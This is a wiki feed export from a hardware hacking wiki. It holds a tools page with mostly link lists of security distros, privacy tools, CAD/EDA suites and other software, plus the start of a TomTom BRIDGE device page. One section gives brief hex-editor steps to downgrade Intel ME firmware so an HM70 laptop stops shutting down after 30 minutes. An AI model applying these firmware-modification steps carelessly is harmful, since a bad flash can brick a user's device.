:Machine shuts down after 30 minutes if a '''&amp;quot;unsupported CPU&amp;quot;''' (Intel Core i3, i5 or i7) is installed in a notebook using the HM70 chipset.&amp;lt;br&amp;gt;&lt;br /&gt;
:The HM70 is aimed at entry-level laptops and budget-conscious consumers, and therefore is locked to [https://www.cpu-upgrade.com/mb-Intel_(chipsets)/HM70_Express.html support only dual core Pentium and Celeron CPUs..]&amp;lt;br&amp;gt;&lt;br /&gt;
:Intel has restricted this chipset in the firmware to shut down after 30 minutes if users attempt to upgrade their entry-level laptops.&lt;br /&gt;
::[[File:Hm70.png|none|thumb|200px|Intel HM70 PCH chipset. CPUs supported: Intel Pentium &amp;amp; Intel Celerons. [https://www.intel.com/content/www/us/en/products/sku/67419/mobile-intel-hm70-express-chipset/compatible.html Intel source]]]&lt;br /&gt;
&lt;br /&gt;
======Intel Management Engine Firmware Downgrade Attack======&lt;br /&gt;
&lt;br /&gt;
::First analyze the firmware after you have made a back-up. Make note of the Intel ME version.&lt;br /&gt;
::Then download the Intel ME version just below the firmware version you try to downgrade.&lt;br /&gt;
::Fire up your hex editor search in your bios blob for '''&amp;quot;0x24, 0x46, 0x50, 0x54, 0x0F, 0x00, 0x00, 0x00, 0x20&amp;quot;''' Intel ME 1.5M blob will start ascii text '''&amp;quot;$FPT&amp;quot;'''.&lt;br /&gt;
::Replace that entire section with the new downgraded Intel ME 1.5m blob. Before flashing make sure Me Analyzer recognises the change. Flash the modification and test it.&lt;br /&gt;
::If you don't see the ME version change with Me Analyzer first try to make note of the offset the Intel ME blob is at and then run it through me_cleaner before injecting a older one.&lt;br /&gt;
&lt;br /&gt;
::This downgrade attack &amp;lt;u&amp;gt;successfully bypassed&amp;lt;/u&amp;gt; the 30 minute shutdown restriction timer.&lt;br /&gt;
&lt;br /&gt;
:'''Required tools''':&lt;br /&gt;
::*[[Software_Tools#Hex_Editors|Hex Editor.]]&lt;br /&gt;
::*[https://github.com/platomav/MEAnalyzer Me Analyzer] - Intel Engine &amp;amp; Graphics Firmware Analysis Tool.&lt;br /&gt;
::*[https://github.com/corna/me_cleaner me_cleaner] - Tool for partial deblobbing of Intel ME/TXE firmware images.&lt;br /&gt;
::*[https://winraid.level1techs.com/t/intel-conv-sec-management-engine-drivers-firmware-and-tools-2-15/30719 Intel (Converged Security) Management Engine: Drivers, Firmware and Tools for (CS)ME 2-15] - Useful resource.&lt;br /&gt;
::*[https://mega.nz/folder/2Q0klQpA#6o04nlV_4xqfx76tjvgi4g (CS)ME Firmware Archive.]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Operating Systems====&lt;br /&gt;
Below are categories of operating systems used for various purposes, including binary reverse engineering, local software analysis, and wireless penetration testing with SDR for RF signal analysis.&lt;br /&gt;
=====Mostly X86-64=====&lt;br /&gt;
======Penetration Testing &amp;amp; Digital Forensics======&lt;br /&gt;
*[https://www.kali.org/ Kali Linux] - is an open-source, Debian-based Linux distribution geared towards various information security tasks, such as Penetration Testing, Security Research, Computer Forensics and Reverse Engineering.&lt;br /&gt;
&lt;br /&gt;
*[https://www.backbox.org/ BlackBox] is more than an operating system, it is a Free Open Source Community Project with the aim of promoting the culture of security in IT environment and give its contribution to make it better and safer.&lt;br /&gt;
&lt;br /&gt;
*[https://blackarch.org/ BlackArch] - is an Arch Linux-based penetration testing distribution for penetration testers and security researchers.&lt;br /&gt;
&lt;br /&gt;
*[https://www.parrotsec.org/ Parrot Security] - is based on top of Debian, the most advanced and recognized universal operating system that can run anywhere.&lt;br /&gt;
&lt;br /&gt;
*[https://labs.fedoraproject.org/security/ Fedora Security Spin] - is a live media based on Fedora to provide a safe test environment for working on security auditing, forensics and penetration testing, coupled with all the Fedora Security features and tools.&lt;br /&gt;
&lt;br /&gt;
*[https://www.caine-live.net/ CAINE] - CAINE (Computer Aided INvestigative Environment) is an Italian GNU/Linux live distribution created as a Digital Forensics project.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/dracos-linux Dracos Linux] - is the Linux operating system from Indonesia, open source is built based on Debian live project under the protection of the GNU General Public License v3.0. This operating system is one variant of Linux distributions, which is used to perform security testing (penetration testing). Dracos linux in Arm by hundreds hydraulic pentest, forensics and reverse engineering.&lt;br /&gt;
&lt;br /&gt;
*[https://www.pentoo.ch/ Pentoo] - is a Live CD and Live USB designed for penetration testing and security assessment. Based off Gentoo Linux, Pentoo is provided both as 32 and 64 bit installable livecd.&lt;br /&gt;
&lt;br /&gt;
======RF Signals Analysis OS [RISC SBC &amp;amp; X86-64]======&lt;br /&gt;
*[https://cemaxecuter.com/ DragonOS] - Out of the box OS for SDRs. Supports Raspberry Pi and x86-64.&lt;br /&gt;
&lt;br /&gt;
======Privacy Operating System======&lt;br /&gt;
*[https://tails.net/ Tails] - is a portable operating system that protects against surveillance and censorship.&lt;br /&gt;
*[https://www.qubes-os.org/ Qubes OS] - is a security-focused operating system that uses virtualization to isolate applications and tasks into separate compartments (called qubes), protecting the system even if one part gets compromised.&lt;br /&gt;
*[https://www.whonix.org/ Whonix] is a privacy-focused Linux distribution that routes all internet traffic through the Tor network using a two-part system of an isolated gateway and a workstation to provide strong anonymity and security.&lt;br /&gt;
&lt;br /&gt;
======Windows 10 IoT LTSC======&lt;br /&gt;
*[https://rentry.co/LTSC LTSC IoT Windows 10 debloat &amp;amp; setup guide] [[Media:LTSC.pdf]] - Useful when you want a clean debloated Windows 10 virtual machine. The IoT LTSC channel receives security updates until Jan 13, 2032. &lt;br /&gt;
&lt;br /&gt;
*[https://rentry.org/fwt2 fwt2] [[Media:Fwt2.pdf]] - Read the /fwt/ paste for a more general overview of Windows.&lt;br /&gt;
&lt;br /&gt;
======Previous Windows versions======&lt;br /&gt;
*[https://hackandpwn.com/windows-7-esu-patching/ Windows 7 ESU Patching] - Information about the minimum set of updates needed for Windows 7 latest ESU hotfixes/patches.&lt;br /&gt;
&lt;br /&gt;
=====Embedded Devices [Network equipment]=====&lt;br /&gt;
&lt;br /&gt;
*[https://openwrt.org/ OpenWrt] - is an open-source project for embedded operating systems based on Linux, primarily used on embedded devices to route network traffic.&lt;br /&gt;
&lt;br /&gt;
*[https://dd-wrt.com/ DD-WRT] - is a Linux based alternative OpenSource firmware suitable for a great variety of WLAN routers and embedded systems. The main emphasis lies on providing the easiest possible handling while at the same time supporting a great number of functionalities within the framework of the respective hardware platform used.&lt;br /&gt;
&lt;br /&gt;
*[https://www.pfsense.org/ pfSense] - is a free and open-source operating system for firewalls and routers, primarily based on FreeBSD, that provides a comprehensive network security solution.&lt;br /&gt;
&lt;br /&gt;
*[https://opnsense.org/ OPNsense] - is an open-source firewall and routing platform built on FreeBSD. It's designed to be user-friendly and easy to configure, offering a wide range of features found in commercial firewalls, plus many more.&lt;br /&gt;
&lt;br /&gt;
=====Smartphones [Android &amp;quot;de-google&amp;quot;]=====&lt;br /&gt;
&lt;br /&gt;
*[https://lineageos.org/ LineageOS] - is a free and open-source operating system for Android devices, based on the Android mobile platform.&lt;br /&gt;
&lt;br /&gt;
*[https://grapheneos.org/ GrapheneOS] - is a privacy and security focused mobile OS with Android app compatibility developed as a non-profit open source project.&lt;br /&gt;
&lt;br /&gt;
*[https://sailfishos.org/ Sailfish OS] - is a secure mobile operating system optimized to run on smartphones and tablets, and also easily adaptable to all kinds of embedded devices and use cases.&lt;br /&gt;
&lt;br /&gt;
*[https://calyxos.org/ CalyxOS] - is a privacy-focused, &amp;quot;de-googled&amp;quot; Android-based operating system created by the Calyx Institute. It aims to defend online privacy, security, and accessibility by removing Google services and replacing them with free and open-source alternatives.&lt;br /&gt;
&lt;br /&gt;
*[https://crdroid.net/ crDroid] - is a highly customized, free Android ROM, based on LineageOS, designed for gaming and customization.&lt;br /&gt;
&lt;br /&gt;
*[https://www.ubuntu-touch.io/ Ubuntu Touch] - is a mobile operating system developed by the UBports community, based on the GNU/Linux operating system. It's a mobile version of Ubuntu, designed for touch-screen devices like smartphones and tablets, with a desktop-like experience. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Tools for opening CAD or Boardview files====&lt;br /&gt;
'''Description''': Boardview is a type of file containing information about printed circuit boards, their components, used signals, test points and more. These files may have following extensions: .asc, .bdv, .brd, .bv, .cad, .cst, .gr, .f2b, .fz, .tvw and others.&lt;br /&gt;
&lt;br /&gt;
*[https://pldaniels.com/flexbv5/ FlexBV]  - Advanced FlexBV boardview software integrates your boardview files with PDF schematics to substantially ease the process of tracking down faults and understanding damaged boards&lt;br /&gt;
&lt;br /&gt;
*[https://openboardview.org/ OpenBoardView] - is a Open Source Linux SDL/ImGui edition software for viewing .brd files, intended as a drop-in replacement for the &amp;quot;Test_Link&amp;quot; software and &amp;quot;Landrex&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
*[https://www.cadence.com/ko_KR/home/tools/allegro-downloads-start.html Allegro®/OrCAD® FREE Physical Viewer] - is a free download that allows you to view and plot databases from Allegro PCB Editor, OrCAD PCB Editor, Allegro Package Designer, and Allegro PCB SI technology.&lt;br /&gt;
&lt;br /&gt;
*[http://boardviewer.net/ BoardViewer] - is software intended for viewing various boardview file types like .tvw files and much more supported formats.&lt;br /&gt;
&lt;br /&gt;
*CADview - simple old tool for viewing CAD files of PCB's (Windows). [[Media:CAD View.zip]] [https://www.virustotal.com/gui/file/9a64621ff34d8d674ba6580538908f4ea170fee9cc1cb700485bd41e3a3a42df VT link]&lt;br /&gt;
&lt;br /&gt;
For resources to open in your favorite boardview program visit &lt;br /&gt;
[[Literature#Datasheets.2C_boardviews.2C_schematics.2C_manuals|Literature -&amp;gt; Datasheets boardviews &amp;amp; schematics]]&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Custom PCB Development Software====&lt;br /&gt;
&lt;br /&gt;
=====Definition and Purpose=====&lt;br /&gt;
::'''Computer-Aided Design (CAD)''' refers to software that enables users to create, modify, analyze, or optimize designs in various fields such as architecture, mechanical engineering, and manufacturing. CAD is predominantly used for designing physical structures and components. It allows designers to visualize objects in two-dimensional (2D) or three-dimensional (3D) formats, facilitating precise planning and adjustments before production begins.&lt;br /&gt;
&lt;br /&gt;
::In contrast, '''Electronic Design Automation (EDA)''' encompasses a suite of software tools specifically tailored for the design of electronic systems. EDA is crucial in industries like semiconductor manufacturing and printed ::circuit board (PCB) design. It focuses on automating the processes involved in designing electronic circuits at various levels—from high-level architectural descriptions down to detailed layouts.&lt;br /&gt;
&lt;br /&gt;
::'''Integration Between CAD and EDA'''&lt;br /&gt;
::While CAD focuses on physical structures, EDA deals with electronic components. However, as products increasingly integrate both mechanical structures and electronic systems—such as IoT devices—the need for collaboration between CAD and EDA has grown. This integration allows designers to embed electronic circuits within mechanical models seamlessly.&lt;br /&gt;
&lt;br /&gt;
=====Electronics Design Automation [[Wikipedia:Electronic_design_automation|(EDA)]] Suite for Developing Custom PCB's=====&lt;br /&gt;
&lt;br /&gt;
*[https://www.kicad.org/ KiCAD] - is a free CAD suite for electronic design automation (EDA). It facilitates the design and simulation of electronic hardware. It features an integrated environment for schematic capture, PCB layout, manufacturing file viewing, ngspice-provided SPICE simulation, and engineering calculation.&lt;br /&gt;
&lt;br /&gt;
*[https://easyeda.com/ EasyEDA] - EasyEDA is a web-based EDA tool suite that enables hardware engineers to design, simulate, share - publicly and privately - and discuss schematics, simulations and printed circuit boards. It can also be used [https://docs.easyeda.com/en/FAQ/Client/index.html offline].&lt;br /&gt;
&lt;br /&gt;
*[https://fritzing.org/ Fritzing] -  is an open-source hardware initiative that makes electronics accessible as a creative material for anyone.&lt;br /&gt;
&lt;br /&gt;
*[https://librepcb.org/ LibrePCB] - is a free, cross-platform, easy-to-use electronic design automation suite to draw schematics and design printed circuit boards – for makers, students and professionals, from beginners to experts.&lt;br /&gt;
&lt;br /&gt;
*[http://www.geda-project.org/ gEDA Project] - The gEDA project has produced and continues working on a full GPL'd suite and toolkit of Electronic Design Automation tools. These tools are used for electrical circuit design, schematic capture, simulation, prototyping, and production.&lt;br /&gt;
&lt;br /&gt;
*[http://repo.hu/projects/pcb-rnd/ pcb-rnd] - is a free/open source, flexible, modular Printed Circuit Board editor. For design of professional and hobby boards. Is feature-rich and compatible. Has a long history, fast paced development, and big plansand is part of the coralEDA ecosystem.&lt;br /&gt;
&lt;br /&gt;
=====Computer Aided Design [[Wikipedia:Computer-aided_design|(CAD)]] Mechanical Engineering=====&lt;br /&gt;
&lt;br /&gt;
*[https://www.freecad.org/ FreeCAD] - is an open-source parametric 3D modeler made primarily to design real-life objects of any size. Parametric modeling allows you to easily modify your design by going back into your model history and changing its parameters.&lt;br /&gt;
&lt;br /&gt;
*[https://openscad.org/ OpenSCAD] - is software for creating solid 3D CAD objects. It is free software and available for Linux/UNIX, MS Windows and Mac OS X.&lt;br /&gt;
&lt;br /&gt;
*[https://brlcad.org/ BRL-CAD] - is a powerful open source cross-platform solid modeling system that includes interactive geometry editing, high-performance ray-tracing for rendering and geometric analysis, a system performance analysis benchmark suite, geometry libraries for application developers, and more than 30 years of active development.&lt;br /&gt;
&lt;br /&gt;
*[https://solvespace.com/index.pl SolveSpace] - is a free (GPLv3) parametric 3d CAD tool. Modeling 3d parts, modeling 2d parts, 3d-printed parts, preparing CAM data, mechanism design, plane and solid geometry.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
====Other software====&lt;br /&gt;
&lt;br /&gt;
=====Display Driver Utilities (Windows)=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/lostindark/DriverStoreExplorer Driver Store Explorer (RAPR)] - is a tool used to manage the Windows driver store, a repository of driver packages that Windows uses to install and update hardware drivers. It helps users list, add, install, delete, and export driver packages, especially those from third-party vendors.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/Wagnard/display-drivers-uninstaller DDU] - is a driver removal utility that can help you completely uninstall AMD/NVIDIA/Intel graphics card drivers and packages from your system, without leaving leftovers behind (including registry keys, folders and files, and driver store).&lt;br /&gt;
&lt;br /&gt;
*[https://www.techpowerup.com/nvcleanstall/ NVCleanstall] - is a free utility from TechPowerUp that allows you to customize your NVIDIA GeForce driver installation. It enables you to remove unnecessary components and install only the drivers you need, potentially optimizing your system performance and minimizing &amp;quot;bloatware&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/GSDragoon/RadeonSoftwareSlimmer Radeon Software Slimmer] - is a utility to trim down the bloat with Radeon Software for AMD GPUs on Microsoft Windows.&lt;br /&gt;
&lt;br /&gt;
*[https://forums.guru3d.com/threads/nvslimmer-nvidia-driver-slimming-utility.423072/ NVSlimmer] - is a third-party utility created by uKER and available on guru3d.com that allows users to remove unwanted components from NVIDIA graphics driver installations, effectively &amp;quot;trimming&amp;quot; down the install base. It's not an official Nvidia utility.&lt;br /&gt;
&lt;br /&gt;
=====Host Based Firewall [Windows FOSS]=====&lt;br /&gt;
*[https://github.com/tnodir/fort Fort Firewall] - is a very practical firewall that allows you to manage your privacy and security in Windows simply and flexibly. This open-source tool is a perfect alternative to the standard Windows firewall, giving you a lot of customizable features so you can work with your files and programs more comfortably.&lt;br /&gt;
&lt;br /&gt;
=====Web Browsing=====&lt;br /&gt;
*[https://www.mozilla.org/firefox/ Mozilla Firefox] - is a free, open source web browser developed by the Mozilla Foundation and Mozilla Corporation in 2004. The Firefox web browser can be used with Windows, Mac and Linux operating systems, as well as Android and iOS mobile devices.&lt;br /&gt;
&lt;br /&gt;
::Extensions &amp;amp; Configurations&lt;br /&gt;
:::*[https://github.com/hackademix/noscript NoScript] - The popular NoScript Security Suite browser extension.&lt;br /&gt;
:::*[https://github.com/ChrisAntaki/disable-webrtc-firefox WebRTC block] - WebRTC leaks your actual IP addresses from behind your VPN, by default. With this extension you can disable it.&lt;br /&gt;
:::*[https://github.com/arkenfox/user.js/ user.js] - Firefox privacy, security and anti-tracking: a comprehensive user.js template for configuration and hardening.&lt;br /&gt;
:::*[https://github.com/yokoffing/Betterfox Betterfox] - Firefox speed, privacy, and security: a user.js template for configuration. Your favorite browser, but better.&lt;br /&gt;
:::*[https://github.com/gorhill/uBlock uBlock] - Help users neutralize privacy-invading ads CPU and memory-efficient.&lt;br /&gt;
:::*[https://github.com/sereneblue/chameleon Chameleon] - is a WebExtension port of the popular Random Agent Spoofer. Spoofs a lot of client fingering techniques and adds security.&lt;br /&gt;
:::*[https://github.com/EFForg/privacybadger Privacy Badger] - is a browser extension that automatically learns to block invisible trackers. PB is made by the leading digital rights nonprofit EFF to stop companies from spying on you.&lt;br /&gt;
&lt;br /&gt;
*[https://www.torproject.org/ Tor Browser] - [[Wikipedia:Tor_(network)|Tor]] (The Onion Router) is a network that anonymizes web traffic to provide truly private web browsing. The Tor Browser hides your IP address and browsing activity by redirecting web traffic through a series of different routers known as nodes.&lt;br /&gt;
&lt;br /&gt;
*[https://guardianproject.info/apps/org.torproject.android/ Orbot for Android] -  is a free proxy app that empowers other apps to use the internet more securely. Orbot uses Tor to encrypt your Internet traffic and then hides it by bouncing through a series of computers around the world. Tor is free software and an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities.&lt;br /&gt;
&lt;br /&gt;
======Public Networks======&lt;br /&gt;
&lt;br /&gt;
*[https://www.torproject.org/ [[Wikipedia:Tor_(netwerk)|Tor]]] - is an open-source privacy network that enables anonymous web browsing. The worldwide Tor computer network uses secure, encrypted protocols to ensure that users' online privacy is protected.&lt;br /&gt;
&lt;br /&gt;
*[https://geti2p.net/ The Invisible Internet Project [[Wikipedia:I2P|(I2P)]]] - is a fully encrypted private network layer. It protects your activity and location. Every day people use the network to connect with people without worry of being tracked or their data being collected.&lt;br /&gt;
&lt;br /&gt;
*[https://www.freenet.de/ FreeNet] - is a peer-to-peer platform for censorship-resistant, anonymous communication. It uses a decentralized distributed data store to keep and deliver information, and has a suite of free software for publishing and communicating on the Web without fear of censorship.&lt;br /&gt;
&lt;br /&gt;
*[https://zeronet.io/ ZeroNet] - Open, free and uncensorable websites, using Bitcoin cryptography and BitTorrent network · We believe in open, free, and uncensored network.&lt;br /&gt;
&lt;br /&gt;
*[https://lokinet.org/ Lokinet] - is an onion-router that lets you access the internet anonymously. Built on LLARP, the fastest onion-routing protocol in the world.&lt;br /&gt;
&lt;br /&gt;
*[https://nymtech.net/ Nym] - protect internet traffic by routing it through a decentralised mixnet that can be accessed anonymously using zk-nyms.&lt;br /&gt;
&lt;br /&gt;
=====Email Clients / Email Encryption Standards=====&lt;br /&gt;
*[https://www.thunderbird.net/ Mozilla ThunderBird] - is a free, open-source, cross-platform application for managing email, news feeds, chat, and news groups. It is a local email application, meaning it installs and runs as a client on your device, being rather than browser or web-based. [https://support.mozilla.org/en-US/kb/openpgp-thunderbird-howto-and-faq FAQ How to implement OpenPGP in Thunderbird].&lt;br /&gt;
&lt;br /&gt;
*[https://www.openpgp.org/ OpenPGP] - is the most widely used email encryption standard. It is defined by the OpenPGP Working Group of the Internet Engineering Task Force (IETF) as a Proposed Standard in RFC 4880. OpenPGP was originally derived from the PGP software, created by Phil Zimmermann.&lt;br /&gt;
&lt;br /&gt;
*[https://www.gnupg.org/ GnuPG] - is a complete and free implementation of the OpenPGP standard as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt and sign your data and communications; it features a versatile key management system, along with access modules for all kinds of public key directories. GnuPG, also known as GPG, is a command line tool with features for easy integration with other applications.&lt;br /&gt;
&lt;br /&gt;
*[https://wiki.gnome.org/Apps/Evolution Evolution] - is a personal information management application that provides integrated mail, calendaring and address book functionality. Check the Privacy Policy sub-page for a general information about user data usage. [https://riseup.net/en/email/clients/evolution FAQ How to implement OpenPGP in Evolution].&lt;br /&gt;
&lt;br /&gt;
*[https://neomutt.org/ NeoMutt] - is a command line mail reader (or MUA ). It's a fork of Mutt with added features.&lt;br /&gt;
&lt;br /&gt;
=====Chat Applications / Platforms=====&lt;br /&gt;
*[https://www.teamspeak.com/ TeamSpeak] - is a VoIP application for audio communication between users via a chat channel, similar to a video meeting. Cross-platform with military-grade security, lag-free performance, privacy and complete control.&lt;br /&gt;
*[https://github.com/RetroShare/RetroShare RetroShare] - is a Free and Open Source cross-platform, Friend-2-Friend and secure decentralised communication platform.&lt;br /&gt;
*[https://github.com/JFreegman/toxic Toxic] - is a Tox-based P2P messenger that provides end-to-end encrypted communications without the use of centralized servers. It supports text messaging, file sharing, 1-on-1 voice and video calls, private audio conferences, public and private text group chats.&lt;br /&gt;
*[https://www.jabber.org/ Jabber] - is a original messaging service based on [https://xmpp.org/ XMPP] and has been continuously offered for free since 1999.&lt;br /&gt;
::XMPP clients &amp;amp; extensions&lt;br /&gt;
:::*[https://xmpp.org/software/ XMPP client list] - is a list of XMPP clients composed by XMPP itself.&lt;br /&gt;
:::*[https://otr.cypherpunks.ca/ Off-the-Record Messaging (OTR) for XMPP] - is a cryptographic protocol that provides encryption for instant messaging conversations. OTR uses a combination of AES symmetric-key algorithm with 128 bits key length, the Diffie–Hellman key exchange with 1536 bits group size, and the SHA-1 hash function.&lt;br /&gt;
:::*[https://omemo.im/ OMEMO.IM] is a free, secure XMPP-based chat client available for Android and Windows that utilizes the OMEMO (Multi-End Message and Object) end-to-end encryption protocol.&lt;br /&gt;
:::*[https://xmpp.org/extensions/xep-0384.html XEP-0384: OMEMO Encryption] defines an end-to-end encryption protocol for XMPP messaging that uses double-ratchet and key-exchange techniques to securely encrypt one-to-one and group chats across multiple devices.&lt;br /&gt;
*[https://getsession.org/ Session] - Session is an end-to-end encrypted messenger that minimises sensitive metadata, designed and built for people who want absolute privacy and freedom from any form of surveillance.&lt;br /&gt;
*[https://github.com/briar Briar] - is a messaging app designed for activists, journalists, and anyone else who needs a safe, easy and robust way to communicate. Unlike traditional messaging apps, Briar doesn't rely on a central server - messages are synchronized directly between the users' devices.&lt;br /&gt;
*[https://matrix.org/ Matrix] - is an open network for secure, decentralised communication.&lt;br /&gt;
*[https://discord.com/ Discord] - is a voice, video and text communication service used by over a hundred million people to hang out and talk with their friends and communities.&lt;br /&gt;
::Discord client advice&lt;br /&gt;
:::*1. Stop using the installed electron PC based version. Use the web version.&lt;br /&gt;
:::*2. Android stock client is spoiled with rubbish code slowing down your SoC and sending loads of analytics, use [https://github.com/Aliucord/Aliucord Aliucord] instead (but carefully read the readme.md, ToS issue).&lt;br /&gt;
&lt;br /&gt;
=====File Archiver Utilities=====&lt;br /&gt;
&lt;br /&gt;
*[https://www.7-zip.org/ 7-Zip]  - is a free and open source file archiver.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/M2Team/NanaZip NanaZip] - is a free and open source file archiver intended for the modern Windows experience.&lt;br /&gt;
&lt;br /&gt;
*[https://peazip.github.io/ PeaZip] - is a free and open source file archiver, similar to WinRar, WinZip, and 7-Zip.&lt;br /&gt;
&lt;br /&gt;
=====Disk Encryption Software=====&lt;br /&gt;
&lt;br /&gt;
*[https://guardianproject.info/archive/luks/ Linux Unified Key Setup (LUKS)] - The Linux Unified Key Setup (LUKS) is a disk encryption specification created by Clemens Fruhwirth in 2004 and originally intended for Linux. LUKS implements a platform-independent standard on-disk format for use in various tools&lt;br /&gt;
&lt;br /&gt;
*[https://www.veracrypt.fr/code/VeraCrypt/ VaraCrypt] - VeraCrypt is free open-source disk encryption software for Windows, Mac OS X and Linux. Support for on-the-fly encryption [[Wikipedia:Disk_encryption|(OTFE)]].&lt;br /&gt;
&lt;br /&gt;
=====Image Manipulation Tools=====&lt;br /&gt;
&lt;br /&gt;
*[https://www.gimp.org/ Gimp] - is the official website of the GNU Image Manipulation Program (GIMP). GIMP is a cross-platform image editor available for GNU/Linux, macOS, Windows and more operating systems. It is free software, you can change its source code and distribute your changes.&lt;br /&gt;
&lt;br /&gt;
*[https://www.getpaint.net/ Paint.net] - is image and photo editing software for PCs that run Windows. It features an intuitive and innovative user interface with support for layers, unlimited undo, special effects, and a wide variety of useful and powerful tools. An active and growing online community provides friendly help, tutorials, and plugins.&lt;br /&gt;
&lt;br /&gt;
=====Video Editing Software / 3D Creation / Dec, Enc, Transcode, etc / Media Players=====&lt;br /&gt;
&lt;br /&gt;
*[https://www.blackmagicdesign.com/products/davinciresolve DaVinci Resolve] - is the world’s only solution that combines editing, color correction, visual effects, motion graphics and audio post production all in one software tool! Its elegant, modern interface is fast to learn and easy for new users, yet powerful for professionals.&lt;br /&gt;
&lt;br /&gt;
*[https://shotcut.org/ Shotcut] - is a free, Open Source, cross-platform video editor for Windows, Mac and Linux. Major features include support for a wide range of formats; no import required meaning native timeline editing; Blackmagic Design support for input and preview monitoring; and resolution support to 4k.&lt;br /&gt;
&lt;br /&gt;
*[https://www.openshot.org/nl/ OpenShot] - is a free, Open Source video editor for Linux, Mac, and Windows. We designed OpenShot to be an easy to use, quick to learn, and surprisingly powerful video editor. Easily cut, slice, and edit any video or film.&lt;br /&gt;
&lt;br /&gt;
*[https://www.blender.org/ Blender] - is the free and open source 3D creation suite. It supports the entirety of the 3D pipeline—modeling, rigging, animation, simulation, rendering, compositing and motion tracking, even video editing and game creation.&lt;br /&gt;
&lt;br /&gt;
*[https://ffmpeg.org/ FFMPEG (Command line interface to convert different formats)] - FFmpeg is the leading multimedia framework, able to decode, encode, transcode, mux, demux, stream, filter and play pretty much anything that humans and machines have created. It supports the most obscure ancient formats up to the cutting edge.&lt;br /&gt;
&lt;br /&gt;
*[https://handbrake.fr/features.php HandBrake] - is an Open Source video transcoder available for Linux, Mac, and Windows. Everyone can use HandBrake to make videos for free. HandBrake is a post-production tool. Its primary purpose is to convert videos from supported source formats to MP4 or MKV format.&lt;br /&gt;
&lt;br /&gt;
*[https://www.videolan.org/ VLC Player] - VLC Media Player (also known as VLC) is a free, open source multimedia player developed by VideoLAN Organization. It is one of the oldest (released for the first time in February 2001) free, portable, cross-platform multimedia player. You can use it to play all popular multimedia files and also DVDs, CDs, VCDs and other streaming protocols.&lt;br /&gt;
&lt;br /&gt;
=====Video Recording and Live Streaming=====&lt;br /&gt;
&lt;br /&gt;
*[https://obsproject.com/ OBS (Open Broadcaster Software)] - is free and Open Source software for video recording and live streaming.&lt;br /&gt;
&lt;br /&gt;
*[https://streamlabs.com/ StreamLabs] - is free live streaming and recording software for Twitch, YouTube, and more for Windows or Mac.&lt;br /&gt;
&lt;br /&gt;
====Search engine (self-hosted &amp;amp; open-source)====&lt;br /&gt;
*[https://github.com/searxng/searxng SearXNG] - is a free and open-source metasearch engine that prioritizes user privacy. It works by aggregating results from various search engines, such as Google, Bing, and DuckDuckGo, without tracking or profiling users. Essentially, it acts as a privacy-respecting proxy for your searches. &lt;br /&gt;
&lt;br /&gt;
*[https://github.com/neon-mmd/websurfx websurfx] - is a free and open-source metasearch engine written in Rust, designed to provide a fast, secure, and privacy-respecting alternative to search engines like SearX. It aggregates results from other search engines without displaying ads, focusing on speed, security, and user privacy. &lt;br /&gt;
&lt;br /&gt;
*[https://github.com/mwmbl/mwmbl Mwmbl] - is a non-profit, open source search engine where the community determines the rankings. We aim to be a replacement for commercial search engines such as Google and Bing.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/yacy/yacy_search_server YaCy] - is a free, open-source, peer-to-peer (P2P) search engine that operates without a central authority. It differs from traditional search engines by allowing users to create their own local or global indexes and share them with other users, creating a decentralized network.&lt;br /&gt;
&lt;br /&gt;
====Social Network / Fediverse (self-hosted &amp;amp; open-source)====&lt;br /&gt;
&lt;br /&gt;
*[https://joinmastodon.org/ Mastodon] - is a free and open-source software for running self-hosted social networking services. It has microblogging features similar to Twitter, which are offered by a large number of independently run nodes, known as instances or servers, each with its own code of conduct, terms of service, privacy policy, privacy options, and content moderation policies. [https://github.com/mastodon/mastodon Github repo].&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/pixelfed/pixelfed PixelFed] - is a decentralized, open-source social media platform focused on photo and video sharing, designed as an alternative to Instagram. It utilizes the ActivityPub protocol, allowing users to interact with accounts on other Pixelfed servers as if they were on the same platform.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/movim/movim Movim] - is a federated blogging and chat platform that acts as a web frontend for the XMPP protocol.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/emilebosch/awesome-fediverse Big fediverse list] - is a curated list of more decentralized social networks.&lt;br /&gt;
&lt;br /&gt;
==Education==&lt;br /&gt;
    &lt;br /&gt;
:[[:Literature|See the literature wiki page for all the resources.]]&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=TomTom_BRIDGE_7%22_Truck/Pro_8275_(4FI70)&amp;diff=3307</id>
		<title>TomTom BRIDGE 7&quot; Truck/Pro 8275 (4FI70)</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=TomTom_BRIDGE_7%22_Truck/Pro_8275_(4FI70)&amp;diff=3307"/>
		<updated>2026-04-04T01:39:01Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: typo&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[File:Tomtom0.png|right|300px]]&lt;br /&gt;
[[File:Tomtom1.png|right|300px]]&lt;br /&gt;
&lt;br /&gt;
== Overview ==&lt;br /&gt;
The '''TomTom BRIDGE 7&amp;quot; Truck / PRO 8275 (model 4FI70)''' is a ruggedized, enterprise-grade GPS navigation and telematics device designed for commercial fleet and truck operations. It combines dedicated truck navigation with an open Android-based platform, allowing integration with business applications and fleet management systems such as WEBFLEET.&lt;br /&gt;
&lt;br /&gt;
The device is part of the TomTom BRIDGE ecosystem, which provides customizable in-vehicle hardware for logistics, telematics, and workflow automation.&lt;br /&gt;
&lt;br /&gt;
== Contents ==&lt;br /&gt;
__TOC__&lt;br /&gt;
